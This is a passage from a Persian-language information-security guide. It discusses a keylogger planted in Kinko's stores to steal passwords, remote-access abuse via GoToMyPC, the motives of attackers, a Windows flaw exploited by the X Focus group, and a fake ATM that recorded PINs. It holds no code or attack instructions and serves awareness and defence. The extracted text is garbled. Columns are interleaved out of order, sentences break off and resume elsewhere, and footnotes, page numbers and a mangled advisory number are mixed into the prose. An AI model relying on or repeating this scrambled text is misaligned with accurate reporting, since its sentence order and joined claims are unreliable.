ﻧﺸﻮﻳﺪ ﺍﻣﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻫـﺮ ﻛـﺎﺭﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺣﺴﺎﺳﻴﺖ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ ﻓﻜـﺮ ﻛﻨﻴـﺪ" .ﺟﻴﺎﻧـﮓ
ﺯﻣﺎﻧﻲ ﺩﺳﺘﮕﻴﺮ ﺷﺪ ﻛﻪ ﻣﻄﺎﺑﻖ ﺳﻮﺍﺑﻖ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﺍﺩﮔـﺎﻩ
ﺍﺯ ﻳﻜﻲ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺮﻭﻗﻪ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻬﺰ ﺑﻪ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ GoToMyPCﺍﺳـﺘﻔﺎﺩﻩ
ﻛﺮﺩﻩ ﺑﻮﺩ .ﺍﻳﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ﻭ ﺍﺯ ﻫﺮ ﻣﻜﺎﻧﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ.
ﺷﺨــﺼﻲ ﻛــﻪ ﺑﺮﻧﺎﻣــﺔ GoToMyPCﺭﻭﻱ ﺭﺍﻳﺎﻧــﺔ ﻭﻱ
ﻧﺼﺐ ﺷﺪﻩ ﺑـﻮﺩ ﺩﺭ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺟـﺮﻡ ﺩﺭ ﺧﺎﻧـﻪ ﺑـﻮﺩ ﻭ
ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟﻪ ﺷﺪ ﻣﻜـﺎﻥﻧﻤـﺎﻱ ﺭﺍﻳﺎﻧـﺔ ﺍﻭ ﺭﻭﻱ ﺻـﻔﺤﻪ
ﺷﺮﻭﻉ ﺑﻪ ﺣﺮﻛﺖ ﻛﺮﺩ ﻭ ﻓﺎﻳﻠﻬﺎ ﺧﻮﺩ ﺑﻪ ﺧـﻮﺩ ﺑـﺎﺯ ﺷـﺪﻧﺪ.
ﺳﭙﺲ ﺩﻳﺪ ﻛﻪ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑـﺎﺯ ﻭ ﻧـﺎﻡ ﺍﻭ ﺩﺭ ﻳـﻚ
ﺳﺮﻭﻳﺲ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭﺝ ﺷـﺪ .ﺟﻴﺎﻧـﮓ ﻛـﻪ ﻣﻨﺘﻈـﺮ
ﺻﺪﻭﺭ ﺣﻜﻢ ﺩﺍﺩﮔـﺎﻩ ﺍﺳـﺖ ،ﻧﻬﺎﻳﺘـﹰﺎ ﺩﺭ ﭼﻬـﺎﺭﺩﻫﻢ ﻓﻮﺭﻳـﻪ
۲۰۰۱ﺑﻪ ﻧﺼﺐ ﻛﺮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﻔﻲ ﺛﺒﺖﻛﻨﻨـﺪﺓ ﻛﻠﻴـﺪ
٦٠
ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ﺍﻋﺘﺮﺍﻑ ﻛﺮﺩ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎﻳﻲ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧﺎﻧـﻪ
ﻭ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻣﻲﺑﺎﺷﺪ ﻭ ﻟﺬﺍ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻌﻲ
ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﻣﺎﻧﻨـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ،ﻧﺘـﺎﻳﺞ ﺣﻤـﻼﺕ،
ﺭﻭﺷــﻬﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ،ﺷــﺒﻜﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎ ،ﻭ ﻧﻴــﺰ
ﻲ
ﻱ ﺍﻣﻨﻴﺘـ ﹺ
ﻱ ﺍﺳﺘﺮﺍﺗﮋ ﹺ
ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯ ﹺ
ﻣﺆﺛﺮ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ .ﻫـﺪﻑ ﻧﻬـﺎﻳﻲ ﺍﻳـﻦ ﻛﺘـﺎﺏ
Neel Mehta
Internet Security Systems
Associated Press Bulletin, July 23, 2003
58
59
60
ﺍﻧﮕﻴﺰﺓ ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺍﻣﻨﻴﺘﻲ ﭼﻴﺴﺖ؟
ﺩﺭ ﺯﻧﺪﮔﻲ ﻭﺍﻗﻌﻲ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺟﻨﺎﻳﻲ
ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻳﻜﻲ ﺍﺯ ﺩﻻﻳﻞ ﻋﻤـﺪﻩ،
ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﻓﺮﺩ ﺧﺮﺍﺑﻜﺎﺭ ﺍﺯ ﺷﺨﺼﻲ ﻛـﻪ ﻓﻜـﺮ ﻣـﻲﻛﻨـﺪ ﺑـﻪ ﺍﻭ
ﺁﺳﻴﺒﻲ ﺭﺳﺎﻧﺪﻩ ،ﻭ ﻳﺎ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﭘﻮﻝ ﺍﺳﺖ.
ﻧﻈﻴﺮ ﻫﻤﻴﻦ ﺗﺨﻠﻔﺎﺕ ﻧﻴﺰ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺗﺨﻠﻒ
ﺩﺭ ﺍﻳﻦ ﻓﻀﺎ ﺍﺯ ﺟﻨﺲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ .ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻲ
ﺍﺯ ﺍﻓﺮﺍﺩ -ﻛﻪ ﻋﻤﻮﻣﹰﺎ "ﺧﺮﺍﺑﻜﺎﺭ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﻗﺎﺩﺭﻧـﺪ ﻭﺍﺭﺩ
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺮﺍﺩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺗﻔﺮﻳﺢ ﻭ ﺳﺮﮔﺮﻣﻲ ﺑﻪ
ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﻨﺪ -ﻳﻚ ﻣﺤﻴﻂ ﭼﺎﻟﺶ ﺑﺮﺍﻧﮕﻴﺰ ﺍﺳـﺖ.
ﺑﻌﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺁﻧﻬــﺎ ﻗــﺪﺭﺕ ﻧﻔــﻮﺫ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ ﻛــﺎﺭﺑﺮﻱ،
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻳﻚ ﺍﻓﺘﺨﺎﺭ ﺑﺮﺍﻱ ﺧﻮﺩ
ﻣﻲﺩﺍﻧﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﺳﺖ.
ﻻ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ "ﺟﻨﺎﻳﺎﺕ ﺑﺪﻭﻥ ﻗﺮﺑﺎﻧﻲ" ﺑـﻪ
ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺳﺘﺪﻻﻝ ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﻳﻚ ﺣﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻭﻟـﻲ ﭼﻴـﺰﻱ
ﺗﻐﻴﻴﺮ ﻧﻤﻲﻳﺎﺑﺪ ﻭ ﺩﺯﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ ﭼـﻪ ﺁﺳـﻴﺒﻲ ﺑـﻪ ﻛـﺴﻲ ﻭﺍﺭﺩ
ﺷﺪﻩ ﺍﺳﺖ؟ ﺩﺭ ﻭﺍﻗﻊ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺣﻘﻮﻗﻲ ﻭ ﭘﻴﺎﻣـﺪﻫﺎﻱ
ﺍﻳﻨﻜﺎﺭ ﺗﻮﺟﻪ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﺣـﺴﺎﺱ ﻧـﺎﺍﻣﻨﻲ ﻗﺮﺑﺎﻧﻴﺎﻧـﺸﺎﻥ ﻛـﻪ
ﻧﺎﺷﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻲﺷﻮﺩ ﻧﻴـﺰ ﺍﻫﻤﻴﺘـﻲ ﻧﻤـﻲ ﺩﻫﻨـﺪ.
ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩﻱ ﻭﺍﺭﺩ
ﺧﺎﻧﺔ ﺷﻤﺎ ﺷﻮﺩ ﻭ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ
ﻛﻨﺪ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻧﺎﻗﻀﺎﻥ ﺍﻣﻨﻴﺖ ﻛﻤـﻚ ﺯﻳـﺎﺩﻱ ﻣـﻲ ﻛﻨـﺪ.
ﺑﺮﺧــﻲ ﺍﺯ ﺧﺮﺍﺑﻜﺎﺭﻫــﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧﻔــﻮﺫ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﻪ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻢ ﺍﻣﻜﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﺑﺮﺧﻲ
ﻻ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﻣﻲﺩﻫﺪ .ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻣﻌﻤﻮ ﹰ
ﺧﺒﺮﻱ Usenetﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﻬﻮﺭ ﻫﺴﺘﻨﺪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ
ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺑـﺰﺍﺭ ﺭﺍ ﺍﺯ ﺁﻧﺠـﺎ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﻭ ﻣـﻮﺭﺩ
ﺑﺨﺶ ﺍﻭﻝ
ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺭﺍ ﺛﺒﺖ ﻧﻤﺎﻳﺪ .ﺍﻳـﻦ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺩﺭ ﻃـﻮﻝ
ﻓﻌﺎﻟﻴﺖ ﻳﻜﺴﺎﻟﺔ ﺧﻮﺩ ﺑﻴﺶ ﺍﺯ ۴۵۰ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ
ﻋﺒــﻮﺭ ﺛﺒــﺖ ﻛــﺮﺩﻩ ﻭ ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳﺘﺮﺳــﻲ ﻭ ﺣﺘــﻲ
ﺑﺎﺯﻛﺮﺩﻥ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﺮﺧﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ.
ﺩﻭﺭ ﺳﺎﺧﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺟﺪﻳﺪ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻗﺪﺭﺕ ﺑﺨـﺸﻴﺪﻥ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﻟـﺬﺕ
ﺑﺮﺩﻥ ﺍﺯ ﺍﻳﻦ ﺩﻧﻴﺎﻱ ﻧﻮﻳﻦ ﺑﻪ ﺭﻭﺷﻲ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤـﺌﻦ ﺍﺳـﺖ .ﺩﺭ
ﻳﻚ ﻛﻼﻡ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻫﺪﻑ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻌﺔ
ﺩﺭﻙ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻴﻖ ﺍﺯ ﻣﺎﻫﻴﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺟـﻮﺩ
ﺑﻪ ﻣﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﻧﻘﺎﻁ ﻗـﻮﺕ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺑﺎﺷﺪ.
٤٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﺪﻭﻥ ﺧﻄﺮ ﺑﺎﺷـﻨﺪ ،ﻫﺮﮔـﺰ ﻛـﺴﻲ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ ﺁﺛـﺎﺭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺩﻗﻴﻘـﹰﺎ ﭼﻴـﺴﺖ .ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳـﻦ
ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍ ﹺﺭ
ﺑﻪﺍﺻﻄﻼﺡ ﺑﻲﺧﻄﺮ ﺑﺘﻮﺍﻥ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻛـﻪ
ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺁﺳﻴﺐ ﻭﺍﺭﺩ ﻛﺮﺩ .ﺩﺭ
ﺍﺩﺍﻣﻪ ،ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺳﻨﺪ CA-203-18ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺁﺧﺮﻳﻦ ﺣﻔﺮﺓ Windowsﺭﺍ ﻣﺴﺘﻨﺪ ﻛﺮﺩﻩ ،ﻭ CNetﻧﻴﺰ
ﮔﺰﺍﺭﺵ ﺩﺍﺩﻩ ﻛﻪ ﺑﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﺮﺍﻱ
ﻧﻔﻮﺫ ﺑﻪ Windowsﺭﺍﻩ ﺑﺮﺍﻱ ﻇﻬﻮﺭ ﺑـﺮﻕﺁﺳـﺎ ﻭ ﺣﻤﻠـﺔ
ﺷﺪﻳﺪ ﻳﻚ ﻛﺮﻡ ﺩﻳﮕﺮ ﻫﻤﻮﺍﺭ ﻣﻲﺷﻮﺩ:
ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺍﻣﻨﻴﺘﻲ ﻫـﺸﺪﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ ﻛـﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺳـﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺷﻜﺎﻝ ﻋﻤﺪﺓ Windowsﻃﺮﺍﺣﻲ ﺷـﺪﻩ
ﻭ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﺑـﺰﺭﮒ ﺗـﺎ ﺍﻭﺍﺧـﺮ ﻫﻔﺘـﺔ
ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻫﺸﺪﺍﺭ ﺭﻭﺯ ﺟﻤﻌﻪ ﺍﻋﻼﻡ ﺷﺪ؛ ﺑﻌـﺪ
ﺍﺯ ﺁﻧﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﭼﻴﻨﻲ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘـﻲ X Focusﻣـﺘﻦ
ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪﻳﻦ ﻣﺮﻛﺰ ﺍﻣﻨﻴﺘﻲ ﺩﻧﻴﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻧﺪ
ﻛﻪ ﺑﺎ ﻃﺮﺍﺣﻲ ﻣﺎﻫﺮﺍﻧﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ
Windowsﻧﻔﻮﺫ ﻣﻲﻛﺮﺩ.
ﺑﺮﻧﺎﻣـــﺔ ﮔـــﺮﻭﻩ X Focusﺍﺯ ﺍﺷـــﻜﺎﻝ ﻣﻮﺟـــﻮﺩ ﺩﺭ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻬﺮﻩﺑـﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﻪ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻣـﻲﺩﻫـﺪ.
ﺍﻳــﻦ ﺍﺷــﻜﺎﻝ ﺗﻮﺳــﻂ ﭼﻨــﺪ ﻧﻔــﺮ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﺑﻌﻨــﻮﺍﻥ
ﺑﺰﺭﮔﺘﺮﻳﻦ ﺍﺷﻜﺎﻟﻲ ﻛﻪ ﺗـﺎ ﻛﻨـﻮﻥ ﺩﺭ Windowsﻳﺎﻓـﺖ
٦١
ﺷﺪﻩ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺍﺳﺖ.
ﺣﻤﻼﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧـﺴﺒﺘﹰﺎ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﻣﺎﺟﺮﺍﻳﻲ ﻃﻮﻻﻧﻲ ﻭ ﺩﻧﺒﺎﻟﻪﺩﺍﺭ ﺍﺳﺖ.
ﺍﻟﺒﺘﻪ ﺗﻤـﺎﻣﻲ ﻧﻘـﺾ ﺣﺮﻳﻤﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺨـﺘﺺ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺴﺘﻨﺪ .ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻧﻴـﺰ ﺗـﺎ ﻛﻨـﻮﻥ ﺑـﺮﺍﻱ
ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ .ﺩﺭ ﻳﻚ
ﻣﻮﺭﺩ )ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻧﻜﺘﻴﻜﺎﺕ ٦٢ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺳﺎﺭﻗﻴﻦ ﺍﻗﺪﺍﻡ ﺑﻪ ﻧـﺼﺐ
ﺩﺳﺘﮕﺎﻫﻲ ﺷﺒﻴﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺩﺭ ﻳﻚ ﻣﺮﻛﺰ ﺧﺮﻳﺪ ﻛﺮﺩﻧـﺪ.
CNet News.com ,July 25,2003
Connecticut State
61
62
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﮔـﺮﻓﺘﻦ ﭘـﻮﻝ ﺍﺯ ﺍﻳـﻦ ﻣﺎﺷـﻴﻦ ﻛـﺎﺭﺕ ﻭ
ﺷﻤﺎﺭﺓ ﺭﻣﺰ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﺮﺩﻧﺪ ،ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﺟﻌﻠﻲ ﺑﺎ ﺫﺧﻴـﺮﺓ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻌﺪﻱ ﺑﻪ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺭﺍ
ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻣﻲﻛﺮﺩ ،ﺍﻣﺎ ﭼﻮﻥ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻗﻌﻲ ﺍﻋﺘﺒـﺎﺭﻱ
ﻧﺪﺍﺷﺖ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻣﺎﻟﻲ ﻧﺒﻮﺩ .ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﺩﻳﮕـﺮ
ﺳﺎﺭﻗﻴﻦ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﻪ ﻧﺤﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻛـﻪ
ﺍﻣﻜﺎﻥ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣـﺪﺗﻲ ﺑﻌـﺪ ﻭ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖﺷﺪﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﻧﻤﻮﺩﻧﺪ.
ﻞ ﻣﺸﺎﻫﺪﻩ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ
ﺍﮔﺮﭼﻪ ﺑﻴﺸﺘﺮ ﺟﺮﺍﺋ ﹺﻢ ﻗﺎﺑ ﹺ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻧﻴـﺰ ﻗـﺎﺩﺭ ﺑـﻪ ﺳـﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻳـﻦ ﻓـﻀﺎ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﻥ ﺑـﻪ ﺍﻫـﺪﺍﻑ
ﺳﺎﺯﻣﺎﻧﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺟـﺮﺍﺋﻢ ﺳـﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ
